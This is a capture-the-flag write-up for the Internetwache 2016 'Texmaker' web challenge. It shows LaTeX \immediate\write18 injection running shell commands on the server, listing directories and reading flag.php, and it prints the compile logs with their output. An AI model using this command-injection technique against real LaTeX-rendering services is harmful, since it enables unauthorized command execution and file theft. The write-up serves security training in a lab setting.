[Internetwache CTF 2016] [Web 90 – Texmaker] Write Up

Description

Creating and using coperate templates is sometimes really hard. Luckily, we have a webinterace for creating PDF files. Some people doubt it’s secure, but I reviewed the whole code and did not find any flaws.

Service: https://texmaker.ctf.internetwache.org

Resolution

This one wasn’t really difficult. The only thing is that we needed to know a bit of Latex… or how to look for it on google 🙂

The website was simple: we only had a form in which we can put some Latex command in order to send them. The script then created the PDF, showed us the log output, and let us download the PDF if we wanted. Obvisously, the thing was to find a way to read files onto the server.

lateeeeeex
lateeeeeex

As we didn’t really knew Latex, we did a bit of google in order to see possible commands: we found this one : \immediate\write18{<command>}

Of course, our first try was to list the current directory by putting ” \immediate\write18{ls}” on the form. The log output was as this:

LOG:
This is pdfTeX, Version 3.14159265-2.6-1.40.15 (TeX Live 2015/dev/Debian) (preloaded format=pdflatex)
 \write18 enabled.
entering extended mode
(./f9087fcce6fe3eb35c3c2a45a4afabb6.tex
LaTeX2e <2014/05/01>
Babel <3.9l> and hyphenation patterns for 2 languages loaded.
(/usr/share/texlive/texmf-dist/tex/latex/base/article.cls
Document Class: article 2014/09/29 v1.4h Standard LaTeX document class
(/usr/share/texlive/texmf-dist/tex/latex/base/size10.clo))
(/usr/share/texlive/texmf-dist/tex/latex/base/inputenc.sty
[...]
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/kvdefinekeys.sty))
(/usr/share/texlive/texmf-dist/tex/latex/oberdiek/kvoptions.sty
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/kvsetkeys.sty
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/etexcmds.sty)))
(/usr/share/texlive/texmf-dist/tex/latex/latexconfig/epstopdf-sys.cfg))01839870459db1adf8c50bf11ec25c05.aux
01839870459db1adf8c50bf11ec25c05.log
01839870459db1adf8c50bf11ec25c05.tex
1877610afd71aacdde122cb19f21f905.aux
1877610afd71aacdde122cb19f21f905.log
1877610afd71aacdde122cb19f21f905.tex
[...]
f55b7e1932bc05ee368d447a3230181e.log
f55b7e1932bc05ee368d447a3230181e.tex
f6d3e7d822c533e39d7c6718911fb423.bbl
f6d3e7d822c533e39d7c6718911fb423.blg
f9087fcce6fe3eb35c3c2a45a4afabb6.aux
f9087fcce6fe3eb35c3c2a45a4afabb6.log
f9087fcce6fe3eb35c3c2a45a4afabb6.tex
foo
foo.pdf
hehe.aux
hogemyhoge
hoo2i.php
hooi
hooi.php
hooi2.php
huehuehue.txt
huehuehue.txt.aux
myhogehoge
out.txt
script.tex
scriptoutput.tex
test.pdf
this_333_a.txt
tmpdate.tex
xd
xd.pdf

It worked like a charm 🙂
But the flag was not here, there was only log output and pdf files. We then tried to list the upper directory by launching the “\immediate\write18{ls ..}” command. Here is the log output:

LOG:
This is pdfTeX, Version 3.14159265-2.6-1.40.15 (TeX Live 2015/dev/Debian) (preloaded format=pdflatex)
 \write18 enabled.
entering extended mode
(./2a1d5d01482b94ce7bdbe8dde57d6601.tex
LaTeX2e <2014/05/01>
Babel <3.9l> and hyphenation patterns for 2 languages loaded.
(/usr/share/texlive/texmf-dist/tex/latex/base/article.cls
Document Class: article 2014/09/29 v1.4h Standard LaTeX document class
(/usr/share/texlive/texmf-dist/tex/latex/base/size10.clo))
[...]
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/kvdefinekeys.sty))
(/usr/share/texlive/texmf-dist/tex/latex/oberdiek/kvoptions.sty
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/kvsetkeys.sty
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/etexcmds.sty)))
(/usr/share/texlive/texmf-dist/tex/latex/latexconfig/epstopdf-sys.cfg))ajax.php
assets
cleanpdfdir.sh
compile
config.php
config.php.sample
flag.php
index.php
pdf
templates

(./2a1d5d01482b94ce7bdbe8dde57d6601.aux) )
No pages of output.
Transcript written on 2a1d5d01482b94ce7bdbe8dde57d6601.log.

So, here is our flag file 🙂 We now just have to find a way to read it. Easy 🙂 We just sent the “\immediate\write18{cat ../flag.php}” command, and…

LOG:
This is pdfTeX, Version 3.14159265-2.6-1.40.15 (TeX Live 2015/dev/Debian) (preloaded format=pdflatex)
 \write18 enabled.
entering extended mode
(./e8f6988c1c71e92856fa1657100ce7aa.tex
LaTeX2e <2014/05/01>
Babel <3.9l> and hyphenation patterns for 2 languages loaded.
(/usr/share/texlive/texmf-dist/tex/latex/base/article.cls
Document Class: article 2014/09/29 v1.4h Standard LaTeX document class
(/usr/share/texlive/texmf-dist/tex/latex/base/size10.clo))
(/usr/share/texlive/texmf-dist/tex/latex/base/inputenc.sty
(/usr/share/texlive/texmf-dist/tex/latex/base/latin1.def))
[...]
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/kvdefinekeys.sty))
(/usr/share/texlive/texmf-dist/tex/latex/oberdiek/kvoptions.sty
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/kvsetkeys.sty
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/etexcmds.sty)))
(/usr/share/texlive/texmf-dist/tex/latex/latexconfig/epstopdf-sys.cfg))<?php

$FLAG = "IW{L4T3x_IS_Tur1ng_c0mpl3te}";
?>

(./e8f6988c1c71e92856fa1657100ce7aa.aux) )
No pages of output.
Transcript written on e8f6988c1c71e92856fa1657100ce7aa.log.

The flag.php file had been read by our cat command!

Flag was IW{L4T3x_IS_Tur1ng_c0mpl3te}

 

Enjoy

The lsd

Leave a Reply

Your email address will not be published. Required fields are marked *